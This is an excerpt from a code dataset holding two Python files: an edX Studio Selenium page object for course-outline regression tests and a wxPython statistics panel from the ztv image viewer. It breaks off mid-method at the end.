repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
raeeschachar/edx-e2e-mirror | regression/pages/studio/course_outline_page.py | 1 | 4324 | """
Course Outline Page for Studio
"""
from edxapp_acceptance.pages.studio.overview import CourseOutlinePage
from selenium.webdriver.common.action_chains import ActionChains
from regression.pages.studio.utils import (
click_confirmation_prompt_primary_button
)
from regression.tests.helpers import get_url
class CourseOutlinePageExtended(CourseOutlinePage):
    """
    Studio Course Outline page extended with helpers used by the
    regression tests: creating/deleting sections and subsections,
    adding units, and driving the subsection-settings dialog.
    """

    @property
    def url(self):
        """
        Construct a URL to the page within the course.
        """
        return get_url(self.url_path, self.course_info)

    def add_section_with_name(self, text):
        """
        Add a section via the (main) New Section button and give it a name.

        Arguments:
            text (str): The newly added section is renamed to this.
        """
        name_input_css = (
            '.wrapper-section-title.wrapper-xblock-field.incontext-editor.is-editable.is-editing'
            ' .xblock-field-input.incontext-editor-input'
        )
        self.q(css='.wrapper-mast nav.nav-actions .button-new').click()
        self.wait_for_element_visibility(name_input_css, 'Section is visible')
        self.q(css=name_input_css).results[0].send_keys(text)
        # Clicking elsewhere commits the name edit and fires an ajax call.
        self.q(css='.content').first.click()
        self.wait_for_ajax()

    def add_subsection_with_name(self, text):
        """
        Add a subsection via the last section's subsection button and name it.

        At least one section must already be present.

        Arguments:
            text (str): The newly added subsection is renamed to this.
        """
        name_input_css = (
            '.wrapper-subsection-title.wrapper-xblock-field.'
            'incontext-editor.is-editable.is-editing'
            ' .xblock-field-input.incontext-editor-input'
        )
        self.q(css='.button-new[data-default-name="Subsection"]').results[-1].click()
        self.wait_for_element_visibility(name_input_css, 'subsection is visible')
        self.wait_for_ajax()
        self.q(css=name_input_css).results[-1].send_keys(text)
        # Clicking elsewhere commits the name edit and fires an ajax call.
        self.q(css='.content').first.click()
        self.wait_for_ajax()

    def click_add_unit_button(self):
        """
        Add a unit by clicking the last subsection's unit button.
        Navigates to the Add Components page.
        """
        self.q(css='.button-new[data-default-name="Unit"]').results[-1].click()

    def get_subsection_grade(self):
        """
        Returns:
            List of grades available in the Grade drop down of the
            subsection settings dialog.
        """
        return self.q(css='#grading_type option').text

    def get_section_count(self):
        """
        Return the total number of sections, counted via their delete icons.
        """
        delete_icons = self.q(
            css='.section-header-actions ul.actions-list '
                'li.action-item.action-delete a.delete-button.'
                'action-button '
                'span.icon.fa.fa-trash-o'
        )
        return len(delete_icons)

    def cancel_subsection_settings(self):
        """
        Click the cancel button of the Subsection Settings pop up.
        """
        self.q(css='.action-cancel').click()
        self.wait_for_ajax()

    def delete_section(self):
        """
        Delete the first section on the page, confirming the prompt.
        """
        self.q(
            css='.section-header-actions ul.actions-list '
                'li.action-item.action-delete a.delete-button.action-button '
                'span.icon.fa.fa-trash-o'
        ).first.click()
        self.wait_for_ajax()
        click_confirmation_prompt_primary_button(self)

    def click_edit_start_date_button(self):
        """
        Click the edit start date button on the Course Outline page.
        """
        pencil_icon = self.q(css='.action-button span.icon.fa.fa-pencil').results[0]
        # The button is hidden until hovered; ActionChains moves the mouse
        # over it first so the click lands on a visible element.
        chain = ActionChains(self.browser)
        chain.move_to_element(pencil_icon).click(pencil_icon).perform()

    def make_sure_only_one_section_is_present(self):
        """
        Delete sections until exactly one remains.
        """
        while self.get_section_count() > 1:
            self.delete_section()
| agpl-3.0 |
henryroe/ztv | ztv/stats_panel.py | 1 | 24355 | from __future__ import absolute_import
import wx
from wx.lib.pubsub import pub
from matplotlib.patches import Rectangle
from matplotlib import cm
import numpy as np
from astropy.stats import sigma_clipped_stats
import sys
from .ztv_wx_lib import set_textctrl_background_color, validate_textctrl_str, textctrl_output_only_background_color
from .ztv_lib import send_to_stream
class StatsPanel(wx.Panel):
    """
    wx panel showing statistics (mean/median/stdev, sigma-clipped "robust"
    equivalents, min/max and their positions) computed over a rectangular
    'stats box' that the user drags out on the primary image panel or edits
    via the x0/x1/xsize and y0/y1/ysize text fields.
    """

    def __init__(self, parent):
        """Build the stats grid UI and register the 'Stats box' cursor mode."""
        wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
        self.ztv_frame = self.GetTopLevelParent()
        # Register this panel's cursor mode so dragging on the image panel
        # routes button/motion events to the handlers below.
        self.ztv_frame.primary_image_panel.popup_menu_cursor_modes.append('Stats box')
        self.ztv_frame.primary_image_panel.available_cursor_modes['Stats box'] = {
            'set-to-mode':self.set_cursor_to_stats_box_mode,
            'on_button_press':self.on_button_press,
            'on_motion':self.on_motion,
            'on_button_release':self.on_button_release}
        self.textentry_font = wx.Font(14, wx.FONTFAMILY_MODERN, wx.NORMAL, wx.FONTWEIGHT_LIGHT, False)
        # Most recent statistics dict; also published over the stream on request.
        self.stats_info = None
        self.last_string_values = {'x0':'', 'xsize':'', 'x1':'', 'y0':'', 'ysize':'', 'y1':''}
        self.stats_rect = Rectangle((0, 0), 10, 10, color='magenta', fill=False, zorder=100)
        # use self.stats_rect as where we store/retrieve the x0,y0,x1,y1
        # x0,y0,x1,y1 should be limited to range of 0 to shape-1
        # but, stats should be calculated over e.g. x0:x1+1 (so that have pixels to do stats on even if x0==x1)
        # and, width/height of stats_rect should always be >= 0
        values_sizer = wx.FlexGridSizer( 10, 5, 0, 0 )
        values_sizer.SetFlexibleDirection( wx.BOTH )
        values_sizer.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )
        # --- header row: Low / # pix / High column labels ---
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        self.low_static_text = wx.StaticText( self, wx.ID_ANY, u"Low", wx.DefaultPosition, wx.DefaultSize, wx.ALIGN_RIGHT )
        self.low_static_text.Wrap( -1 )
        values_sizer.Add(self.low_static_text, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 0)
        # NOTE(review): self.low_static_text is re-bound here, so the "Low"
        # label created just above is no longer reachable by attribute after
        # __init__ — looks unintentional; confirm.
        self.low_static_text = wx.StaticText( self, wx.ID_ANY, u"# pix", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.low_static_text.Wrap( -1 )
        values_sizer.Add(self.low_static_text, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 0)
        self.high_static_text = wx.StaticText( self, wx.ID_ANY, u"High", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.high_static_text.Wrap( -1 )
        values_sizer.Add(self.high_static_text, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 0)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        # --- x row: x0 / xsize / x1 entry fields ---
        self.x_static_text = wx.StaticText( self, wx.ID_ANY, u"x", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.x_static_text.Wrap( -1 )
        values_sizer.Add(self.x_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 0)
        self.x0_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                       wx.TE_PROCESS_ENTER)
        self.x0_textctrl.SetFont(self.textentry_font)
        values_sizer.Add(self.x0_textctrl, 0, wx.ALL, 2)
        self.x0_textctrl.Bind(wx.EVT_TEXT, self.x0_textctrl_changed)
        self.x0_textctrl.Bind(wx.EVT_TEXT_ENTER, self.x0_textctrl_entered)
        self.xsize_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                          wx.TE_PROCESS_ENTER)
        self.xsize_textctrl.SetFont(self.textentry_font)
        values_sizer.Add(self.xsize_textctrl, 0, wx.ALL, 2)
        self.xsize_textctrl.Bind(wx.EVT_TEXT, self.xsize_textctrl_changed)
        self.xsize_textctrl.Bind(wx.EVT_TEXT_ENTER, self.xsize_textctrl_entered)
        self.x1_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                       wx.TE_PROCESS_ENTER)
        self.x1_textctrl.SetFont(self.textentry_font)
        values_sizer.Add(self.x1_textctrl, 0, wx.ALL, 2)
        self.x1_textctrl.Bind(wx.EVT_TEXT, self.x1_textctrl_changed)
        self.x1_textctrl.Bind(wx.EVT_TEXT_ENTER, self.x1_textctrl_entered)
        self.npix_static_text = wx.StaticText( self, wx.ID_ANY, u"# pixels", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.npix_static_text.Wrap( -1 )
        values_sizer.Add(self.npix_static_text, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_BOTTOM, 0)
        # --- y row: y0 / ysize / y1 entry fields, plus read-only pixel count ---
        self.y_static_text = wx.StaticText( self, wx.ID_ANY, u"y", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.y_static_text.Wrap( -1 )
        values_sizer.Add(self.y_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 0)
        self.y0_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                       wx.TE_PROCESS_ENTER)
        self.y0_textctrl.SetFont(self.textentry_font)
        values_sizer.Add(self.y0_textctrl, 0, wx.ALL, 2)
        self.y0_textctrl.Bind(wx.EVT_TEXT, self.y0_textctrl_changed)
        self.y0_textctrl.Bind(wx.EVT_TEXT_ENTER, self.y0_textctrl_entered)
        self.ysize_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                          wx.TE_PROCESS_ENTER)
        self.ysize_textctrl.SetFont(self.textentry_font)
        values_sizer.Add(self.ysize_textctrl, 0, wx.ALL, 2)
        self.ysize_textctrl.Bind(wx.EVT_TEXT, self.ysize_textctrl_changed)
        self.ysize_textctrl.Bind(wx.EVT_TEXT_ENTER, self.ysize_textctrl_entered)
        self.y1_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                       wx.TE_PROCESS_ENTER)
        self.y1_textctrl.SetFont(self.textentry_font)
        values_sizer.Add(self.y1_textctrl, 0, wx.ALL, 2)
        self.y1_textctrl.Bind(wx.EVT_TEXT, self.y1_textctrl_changed)
        self.y1_textctrl.Bind(wx.EVT_TEXT_ENTER, self.y1_textctrl_entered)
        self.npix_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                         wx.TE_READONLY)
        self.npix_textctrl.SetFont(self.textentry_font)
        self.npix_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.npix_textctrl, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT, 0)
        # vertical gap before the statistics rows
        values_sizer.AddSpacer((0,15), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        # --- median / robust header row ---
        self.median_static_text = wx.StaticText( self, wx.ID_ANY, u"Median", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.median_static_text.Wrap( -1 )
        values_sizer.Add(self.median_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
        self.median_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                           wx.TE_READONLY)
        self.median_textctrl.SetFont(self.textentry_font)
        self.median_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.median_textctrl, 0, wx.ALL, 2)
        self.robust_static_text = wx.StaticText( self, wx.ID_ANY, u"Robust", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.robust_static_text.Wrap( -1 )
        values_sizer.Add(self.robust_static_text, 0, wx.ALL|wx.ALIGN_BOTTOM|wx.ALIGN_CENTER_HORIZONTAL, 0)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        # --- mean row (plain and sigma-clipped) ---
        self.mean_static_text = wx.StaticText( self, wx.ID_ANY, u"Mean", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.mean_static_text.Wrap( -1 )
        values_sizer.Add(self.mean_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
        self.mean_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                         wx.TE_READONLY)
        self.mean_textctrl.SetFont(self.textentry_font)
        self.mean_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.mean_textctrl, 0, wx.ALL, 2)
        self.robust_mean_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                                wx.TE_READONLY)
        self.robust_mean_textctrl.SetFont(self.textentry_font)
        self.robust_mean_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.robust_mean_textctrl, 0, wx.ALL, 2)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        # --- stdev row (plain and sigma-clipped) ---
        self.stdev_static_text = wx.StaticText( self, wx.ID_ANY, u"Stdev", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.stdev_static_text.Wrap( -1 )
        values_sizer.Add(self.stdev_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
        self.stdev_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                          wx.TE_READONLY)
        self.stdev_textctrl.SetFont(self.textentry_font)
        self.stdev_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.stdev_textctrl, 0, wx.ALL, 2)
        self.robust_stdev_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                                 wx.TE_READONLY)
        self.robust_stdev_textctrl.SetFont(self.textentry_font)
        self.robust_stdev_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.robust_stdev_textctrl, 0, wx.ALL, 2)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        # vertical gap before the min/max rows
        values_sizer.AddSpacer((0,15), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        # --- min row: value and position(s) ---
        self.min_static_text = wx.StaticText( self, wx.ID_ANY, u"Min", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.min_static_text.Wrap( -1 )
        values_sizer.Add(self.min_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
        self.minval_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                           wx.TE_READONLY)
        self.minval_textctrl.SetFont(self.textentry_font)
        self.minval_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.minval_textctrl, 0, wx.ALL, 2)
        self.minpos_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                           wx.TE_READONLY)
        self.minpos_textctrl.SetFont(self.textentry_font)
        self.minpos_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.minpos_textctrl, 0, wx.ALL, 2)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        values_sizer.AddSpacer((0,0), 0, wx.EXPAND)
        # --- max row: value and position(s), plus the Show/Hide toggle ---
        self.max_static_text = wx.StaticText( self, wx.ID_ANY, u"Max", wx.DefaultPosition, wx.DefaultSize, 0 )
        self.max_static_text.Wrap( -1 )
        values_sizer.Add(self.max_static_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 0)
        self.maxval_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                           wx.TE_READONLY)
        self.maxval_textctrl.SetFont(self.textentry_font)
        self.maxval_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.maxval_textctrl, 0, wx.ALL, 2)
        self.maxpos_textctrl = wx.TextCtrl(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
                                           wx.TE_READONLY)
        self.maxpos_textctrl.SetFont(self.textentry_font)
        self.maxpos_textctrl.SetBackgroundColour(textctrl_output_only_background_color)
        values_sizer.Add(self.maxpos_textctrl, 0, wx.ALL, 2)
        # The button label doubles as state: 'Show' when the rect overlay is
        # hidden, 'Hide' when it is displayed (see on_hideshow_button).
        self.hideshow_button = wx.Button(self, wx.ID_ANY, u"Show", wx.DefaultPosition, wx.DefaultSize, 0)
        values_sizer.Add(self.hideshow_button, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL, 2)
        self.hideshow_button.Bind(wx.EVT_BUTTON, self.on_hideshow_button)
        v_sizer1 = wx.BoxSizer(wx.VERTICAL)
        v_sizer1.AddStretchSpacer(1.0)
        v_sizer1.Add(values_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL)
        v_sizer1.AddStretchSpacer(1.0)
        self.SetSizer(v_sizer1)
        # pubsub wiring: recompute on image redisplay, accept external box
        # parameters, and answer requests for the current stats.
        pub.subscribe(self.queue_update_stats, 'recalc-display-image-called')
        pub.subscribe(self._set_stats_box_parameters, 'set-stats-box-parameters')
        pub.subscribe(self.publish_stats_to_stream, 'get-stats-box-info')

    def publish_stats_to_stream(self, msg=None):
        """Send the most recent stats_info dict to stdout via send_to_stream."""
        wx.CallAfter(send_to_stream, sys.stdout, ('stats-box-info', self.stats_info))

    def on_button_press(self, event):
        """Start a new stats box at the press location and remember the anchor."""
        self.select_panel()
        self.update_stats_box(event.xdata, event.ydata, event.xdata, event.ydata)
        self.redraw_overplot_on_image()
        self.cursor_stats_box_x0, self.cursor_stats_box_y0 = event.xdata, event.ydata

    def on_motion(self, event):
        """While dragging, stretch the box from the anchor to the cursor."""
        if event.button is not None:
            self.update_stats_box(self.cursor_stats_box_x0, self.cursor_stats_box_y0, event.xdata, event.ydata)
            self.redraw_overplot_on_image()
            self.update_stats()

    def on_button_release(self, event):
        """Finalize the drag: redraw the overlay and recompute statistics."""
        self.redraw_overplot_on_image()
        self.update_stats()

    def set_cursor_to_stats_box_mode(self, event):
        """Switch the image panel's cursor mode to 'Stats box' and focus this panel."""
        self.ztv_frame.primary_image_panel.cursor_mode = 'Stats box'
        self.ztv_frame.stats_panel.select_panel()
        self.ztv_frame.stats_panel.highlight_panel()

    def queue_update_stats(self, msg=None):
        """
        wrapper to call update_stats from CallAfter in order to make GUI as responsive as possible.
        """
        wx.CallAfter(self.update_stats, msg=None)

    def _set_stats_box_parameters(self, msg):
        """
        wrapper to update_stats_box to receive messages & translate them correctly
        """
        x0,x1,y0,y1 = [None]*4
        if msg['xrange'] is not None:
            x0,x1 = msg['xrange']
        if msg['yrange'] is not None:
            y0,y1 = msg['yrange']
        if msg['xrange'] is not None or msg['yrange'] is not None:
            self.update_stats_box(x0, y0, x1, y1)
        if msg['show_overplot'] is not None:
            if msg['show_overplot']:
                self.redraw_overplot_on_image()
            else:
                self.remove_overplot_on_image()
        # acknowledge completion back over the stream
        send_to_stream(sys.stdout, ('set-stats-box-parameters-done', True))

    def update_stats_box(self, x0=None, y0=None, x1=None, y1=None):
        """
        Update the stats rectangle; any corner coordinate left as None keeps
        its current value.  Coordinates are sorted (x0<=x1, y0<=y1) and
        clamped to the image bounds before being stored on stats_rect.
        """
        if x0 is None:
            x0 = self.stats_rect.get_x()
        if y0 is None:
            y0 = self.stats_rect.get_y()
        if x1 is None:
            x1 = self.stats_rect.get_x() + self.stats_rect.get_width()
        if y1 is None:
            y1 = self.stats_rect.get_y() + self.stats_rect.get_height()
        if x0 > x1:
            x0, x1 = x1, x0
        if y0 > y1:
            y0, y1 = y1, y0
        # clamp to 0..shape-1 (numpy shape is (rows, cols) = (y, x))
        x0 = min(max(0, x0), self.ztv_frame.display_image.shape[1] - 1)
        y0 = min(max(0, y0), self.ztv_frame.display_image.shape[0] - 1)
        x1 = min(max(0, x1), self.ztv_frame.display_image.shape[1] - 1)
        y1 = min(max(0, y1), self.ztv_frame.display_image.shape[0] - 1)
        self.stats_rect.set_bounds(x0, y0, x1 - x0, y1 - y0)
        # only redraw the canvas when the overlay is currently shown
        if self.hideshow_button.GetLabel() == 'Hide':
            self.ztv_frame.primary_image_panel.figure.canvas.draw()
        self.update_stats()

    def remove_overplot_on_image(self):
        """Remove the stats rectangle overlay and flip the button to 'Show'."""
        self.ztv_frame.primary_image_panel.remove_patch('stats_panel:stats_rect')
        self.hideshow_button.SetLabel(u"Show")

    def redraw_overplot_on_image(self):
        """Draw (or re-draw) the stats rectangle overlay; flip the button to 'Hide'."""
        self.ztv_frame.primary_image_panel.add_patch('stats_panel:stats_rect', self.stats_rect)
        self.hideshow_button.SetLabel(u"Hide")

    def on_hideshow_button(self, evt):
        """Toggle the overlay based on the button's current label."""
        if self.hideshow_button.GetLabel() == 'Hide':
            self.remove_overplot_on_image()
        else:
            self.redraw_overplot_on_image()

    def get_x0y0x1y1_from_stats_rect(self):
        """Return the rectangle's corners as (x0, y0, x1, y1)."""
        x0 = self.stats_rect.get_x()
        y0 = self.stats_rect.get_y()
        x1 = x0 + self.stats_rect.get_width()
        y1 = y0 + self.stats_rect.get_height()
        return x0,y0,x1,y1

    def update_stats(self, msg=None):
        """
        Recompute all statistics over the current stats box (inclusive of both
        endpoints, i.e. the slice x0:x1+1, y0:y1+1) and refresh every field.
        """
        x0,y0,x1,y1 = self.get_x0y0x1y1_from_stats_rect()
        x0, y0 = int(np.round(x0)), int(np.round(y0))
        x1, y1 = int(np.round(x1)), int(np.round(y1))
        self.last_string_values['x0'] = str(int(x0))
        self.x0_textctrl.SetValue(self.last_string_values['x0'])
        self.last_string_values['y0'] = str(int(y0))
        self.y0_textctrl.SetValue(self.last_string_values['y0'])
        x_npix = int(x1 - x0 + 1)
        self.last_string_values['xsize'] = str(x_npix)
        self.xsize_textctrl.SetValue(self.last_string_values['xsize'])
        y_npix = int(y1 - y0 + 1)
        self.last_string_values['ysize'] = str(y_npix)
        self.ysize_textctrl.SetValue(self.last_string_values['ysize'])
        self.last_string_values['x1'] = str(int(x1))
        self.x1_textctrl.SetValue(self.last_string_values['x1'])
        self.last_string_values['y1'] = str(int(y1))
        self.y1_textctrl.SetValue(self.last_string_values['y1'])
        self.npix_textctrl.SetValue(str(x_npix * y_npix))
        stats_data = self.ztv_frame.display_image[y0:y1+1, x0:x1+1]
        finite_mask = np.isfinite(stats_data)
        # NOTE(review): identity comparison against np.True_ is fragile
        # (depends on numpy returning the singleton bool scalar); an equality
        # test would be more conventional — confirm before changing.
        if finite_mask.max() is np.True_:
            stats_data_mean = stats_data[finite_mask].mean()
            stats_data_median = np.median(stats_data[finite_mask])
            stats_data_std = stats_data[finite_mask].std()
            robust_mean, robust_median, robust_std = sigma_clipped_stats(stats_data[finite_mask])
        else:
            # no finite pixels at all: fall back to NaN/Inf placeholders
            stats_data_mean = np.nan
            stats_data_median = np.nan
            stats_data_std = np.inf
            robust_mean, robust_median, robust_std = np.nan, np.nan, np.inf
        self.stats_info = {'xrange':[x0,x1], 'yrange':[y0,y1],
                           'mean':stats_data_mean, 'median':stats_data_median, 'std':stats_data_std,
                           'min':stats_data.min(), 'max':stats_data.max()} # want min/max to reflect any Inf/NaN
        self.mean_textctrl.SetValue("{:0.4g}".format(self.stats_info['mean']))
        self.median_textctrl.SetValue("{:0.4g}".format(self.stats_info['median']))
        self.stdev_textctrl.SetValue("{:0.4g}".format(self.stats_info['std']))
        self.stats_info['robust-mean'] = robust_mean
        self.stats_info['robust-median'] = robust_median
        self.stats_info['robust-std'] = robust_std
        self.robust_mean_textctrl.SetValue("{:0.4g}".format(robust_mean))
        self.robust_stdev_textctrl.SetValue("{:0.4g}".format(robust_std))
        self.minval_textctrl.SetValue("{:0.4g}".format(self.stats_info['min']))
        self.maxval_textctrl.SetValue("{:0.4g}".format(self.stats_info['max']))
        # positions of the extrema, translated into full-image coordinates;
        # a single match is unwrapped from the list for display
        wmin = np.where(stats_data == stats_data.min())
        wmin = [(wmin[1][i] + x0,wmin[0][i] + y0) for i in np.arange(wmin[0].size)]
        if len(wmin) == 1:
            wmin = wmin[0]
        self.minpos_textctrl.SetValue("{}".format(wmin))
        self.stats_info['wmin'] = wmin
        wmax = np.where(stats_data == stats_data.max())
        wmax = [(wmax[1][i] + x0,wmax[0][i] + y0) for i in np.arange(wmax[0].size)]
        if len(wmax) == 1:
            wmax = wmax[0]
        self.maxpos_textctrl.SetValue("{}".format(wmax))
        self.stats_info['wmax'] = wmax
        # all coordinate fields now reflect validated values
        set_textctrl_background_color(self.x0_textctrl, 'ok')
        set_textctrl_background_color(self.x1_textctrl, 'ok')
        set_textctrl_background_color(self.xsize_textctrl, 'ok')
        set_textctrl_background_color(self.y0_textctrl, 'ok')
        set_textctrl_background_color(self.y1_textctrl, 'ok')
        set_textctrl_background_color(self.ysize_textctrl, 'ok')

    def x0_textctrl_changed(self, evt):
        """Live-validate the x0 field as the user types."""
        validate_textctrl_str(self.x0_textctrl, int, self.last_string_values['x0'])

    def x0_textctrl_entered(self, evt):
        """Apply a new x0 on Enter if it validates as an int."""
        if validate_textctrl_str(self.x0_textctrl, int, self.last_string_values['x0']):
            self.last_string_values['x0'] = self.x0_textctrl.GetValue()
            self.update_stats_box(int(self.last_string_values['x0']), None, None, None)
            self.x0_textctrl.SetSelection(-1, -1)
            self.redraw_overplot_on_image()

    def xsize_textctrl_changed(self, evt):
        """Live-validate the xsize field as the user types."""
        validate_textctrl_str(self.xsize_textctrl, int, self.last_string_values['xsize'])

    def xsize_textctrl_entered(self, evt):
        """Resize the box in x about its center, clamped to the image width."""
        if validate_textctrl_str(self.xsize_textctrl, int, self.last_string_values['xsize']):
            self.last_string_values['xsize'] = self.xsize_textctrl.GetValue()
            xsize = int(self.last_string_values['xsize'])
            # NOTE(review): leftover debug output? — confirm and remove.
            sys.stderr.write("\n\nxsize = {}\n\n".format(xsize))
            x0,y0,x1,y1 = self.get_x0y0x1y1_from_stats_rect()
            xc = (x0 + x1) / 2.
            x0 = max(0, int(xc - xsize / 2.))
            x1 = x0 + xsize - 1
            x1 = min(x1, self.ztv_frame.display_image.shape[1] - 1)
            x0 = x1 - xsize + 1
            # NOTE(review): this re-derivation of x0 from the center discards
            # the right-edge adjustment made on the previous line; possibly
            # leftover — confirm intended behavior.
            x0 = max(0, int(xc - xsize / 2.))
            self.update_stats_box(x0, y0, x1, y1)
            self.xsize_textctrl.SetSelection(-1, -1)
            self.redraw_overplot_on_image()

    def x1_textctrl_changed(self, evt):
        """Live-validate the x1 field as the user types."""
        validate_textctrl_str(self.x1_textctrl, int, self.last_string_values['x1'])

    def x1_textctrl_entered(self, evt):
        """Apply a new x1 on Enter if it validates as an int."""
        if validate_textctrl_str(self.x1_textctrl, int, self.last_string_values['x1']):
            self.last_string_values['x1'] = self.x1_textctrl.GetValue()
            self.update_stats_box(None, None, int(self.last_string_values['x1']), None)
            self.x1_textctrl.SetSelection(-1, -1)
            self.redraw_overplot_on_image()

    def y0_textctrl_changed(self, evt):
        """Live-validate the y0 field as the user types."""
        validate_textctrl_str(self.y0_textctrl, int, self.last_string_values['y0'])

    def y0_textctrl_entered(self, evt):
        """Apply a new y0 on Enter if it validates as an int."""
        if validate_textctrl_str(self.y0_textctrl, int, self.last_string_values['y0']):
            self.last_string_values['y0'] = self.y0_textctrl.GetValue()
            self.update_stats_box(None, int(self.last_string_values['y0']), None, None)
            self.y0_textctrl.SetSelection(-1, -1)
            self.redraw_overplot_on_image()

    def ysize_textctrl_changed(self, evt):
        """Live-validate the ysize field as the user types."""
        validate_textctrl_str(self.ysize_textctrl, int, self.last_string_values['ysize'])

    def ysize_textctrl_entered(self, evt):
        """Resize the box in y about its center, clamped to the image height."""
        if validate_textctrl_str(self.ysize_textctrl, int, self.last_string_values['ysize']):
            self.last_string_values['ysize'] = self.ysize_textctrl.GetValue()
            ysize = int(self.last_string_values['ysize'])
            x0,y0,x1,y1 = self.get_x0y0x1y1_from_stats_rect()
            yc = (y0 + y1) / 2.
            y0 = max(0, int(yc - ysize / 2.))
            y1 = y0 + ysize - 1
            y1 = min(y1, self.ztv_frame.display_image.shape[0] - 1)
            y0 = y1 - ysize + 1
            # NOTE(review): same re-derivation pattern as in
            # xsize_textctrl_entered; this discards the bottom-edge
            # adjustment made on the previous line — confirm.
            y0 = max(0, int(yc - ysize / 2.))
            self.update_stats_box(x0, y0, x1, y1)
            self.ysize_textctrl.SetSelection(-1, -1)
            self.redraw_overplot_on_image()

    def y1_textctrl_changed(self, evt):
        """Live-validate the y1 field as the user types."""
        validate_textctrl_str(self.y1_textctrl, int, self.last_string_values['y1'])

    def y1_textctrl_entered(self, evt):
        """Apply a new y1 on Enter if it validates as an int."""
